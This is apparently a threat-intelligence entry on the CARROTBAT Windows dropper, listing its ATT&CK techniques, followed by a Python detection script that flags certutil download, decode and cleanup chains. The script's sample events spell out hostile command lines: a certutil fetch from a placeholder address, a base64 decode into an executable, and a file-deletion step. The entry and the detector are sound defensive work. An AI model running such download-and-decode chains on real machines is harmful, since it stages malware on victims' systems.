CARROTBAT

CARROTBAT is a customized dropper that has been in use since at least 2017. CARROTBAT has been used to install SYSCON and has infrastructure overlap with KONNI.[1][2]

ID: S0462
Type: MALWARE
Platforms: Windows
Version: 1.2
Created: 02 June 2020
Last Modified: 11 April 2024

Techniques Used

Domain | ID | Name
Use

Enterprise | T1059.003 | Command and Scripting Interpreter: Windows Command Shell
CARROTBAT has the ability to execute command line arguments on a compromised host.[2]

Enterprise | T1070.004 | Indicator Removal: File Deletion
CARROTBAT has the ability to delete downloaded files from a compromised host.[1]

Enterprise | T1105 | Ingress Tool Transfer
CARROTBAT has the ability to download and execute a remote file via certutil.[1]

Enterprise | T1027.010 | Obfuscated Files or Information: Command Obfuscation
CARROTBAT has the ability to execute obfuscated commands on the infected host.[1]

Enterprise | T1027.013 | Obfuscated Files or Information: Encrypted/Encoded File
CARROTBAT has the ability to download a base64 encoded payload.[1]

Enterprise | T1082 | System Information Discovery
CARROTBAT has the ability to determine the operating system of the compromised host and whether Windows is being run with x86 or x64 architecture.[1][2]
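The certutil download, base64 payload decode, cmd.exe launch chain and later deletion of the downloaded file listed above are all visible in process-creation telemetry. The following is an added detection sketch, not code from MITRE or from the cited reports: it walks parsed process-creation records (a constructed, simplified Sysmon Event 1 / 4688 shape with pid, image, parent_image and cmdline fields) and tags each record with the technique IDs from this table. The sample events, pids, paths and the 203.0.113.10 address are constructed for illustration; the flag and image names are certutil's and cmd.exe's real ones.

```python
"""Tag process-creation events with the CARROTBAT-style behaviours from the
ATT&CK table: certutil download (T1105), certutil base64 decode (T1027.013),
certutil launched from cmd.exe (T1059.003) and a later 'del' of a file that
certutil wrote (T1070.004). Added example; event shape and values are constructed."""
import re
from typing import Dict, List, Set

CERTUTIL_DOWNLOAD_FLAGS = {"urlcache", "verifyctl"}   # certutil switches that fetch a remote file
CERTUTIL_DECODE_FLAGS = {"decode", "decodehex"}       # certutil switches that decode base64/hex on disk
URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
TOKEN_RE = re.compile(r'"[^"]*"|\S+')                 # keep quoted Windows paths as one token

# Constructed events (not real telemetry), in the order they would be logged.
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\System32\certutil.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://203.0.113.10/update.txt C:\Users\Public\update.txt"},
    {"pid": 4130, "image": r"C:\Windows\System32\certutil.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"certutil.exe -decode C:\Users\Public\update.txt C:\Users\Public\update.exe"},
    {"pid": 4140, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Users\Public\update.exe",
     "cmdline": r"cmd.exe /c del C:\Users\Public\update.txt"},
    # Benign certutil use from an interactive shell: hashing a file, no URL, no decode.
    {"pid": 4150, "image": r"C:\Windows\System32\certutil.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"certutil.exe -hashfile C:\Tools\setup.exe SHA256"},
]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _tokens(cmdline: str) -> List[str]:
    return TOKEN_RE.findall(cmdline)


def _flags(tokens: List[str]) -> Set[str]:
    # certutil accepts both '-flag' and '/flag'; normalise to the bare, lowercased name.
    return {t.lstrip("-/").lower() for t in tokens[1:] if t and t[0] in "-/"}


def classify(event: Dict[str, object]) -> List[str]:
    """Technique IDs for a single certutil process-creation event (empty if none)."""
    hits: List[str] = []
    if _basename(str(event["image"])) != "certutil.exe":
        return hits
    tokens = _tokens(str(event["cmdline"]))
    flags = _flags(tokens)
    has_url = any(URL_RE.match(t.strip('"')) for t in tokens)
    if flags & CERTUTIL_DOWNLOAD_FLAGS and has_url:
        hits.append("T1105")          # remote file fetched via certutil
    if flags & CERTUTIL_DECODE_FLAGS:
        hits.append("T1027.013")      # encoded payload decoded on disk
    if hits and _basename(str(event["parent_image"])) == "cmd.exe":
        hits.append("T1059.003")      # chain driven from the Windows command shell
    return hits


def scan(events: List[Dict[str, object]]) -> Dict[int, List[str]]:
    """Walk events in order, remembering files certutil wrote so that a later
    cmd.exe 'del' of one of them is tied back to the download (T1070.004)."""
    written: Set[str] = set()
    results: Dict[int, List[str]] = {}
    for ev in events:
        tokens = _tokens(str(ev["cmdline"]))
        hits = classify(ev)
        if "T1105" in hits or "T1027.013" in hits:
            # For -urlcache and -decode the output path is the final argument.
            written.add(tokens[-1].strip('"').lower())
        if _basename(str(ev["image"])) == "cmd.exe" and \
                any(t.lower() in ("del", "erase") for t in tokens) and \
                any(t.strip('"').lower() in written for t in tokens):
            hits.append("T1070.004")
        if hits:
            results[int(ev["pid"])] = hits
    return results


if __name__ == "__main__":
    for pid, techniques in scan(SAMPLE_EVENTS).items():
        print(pid, ", ".join(techniques))
```

The deletion rule is deliberately stateful: on its own, `cmd.exe /c del` is far too common to alert on, but a `del` of a path that certutil wrote moments earlier is the specific cleanup step described in the table. Matching on the image basename means a renamed certutil copy would be missed; in production, key the rule on the PE's original filename field instead.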

References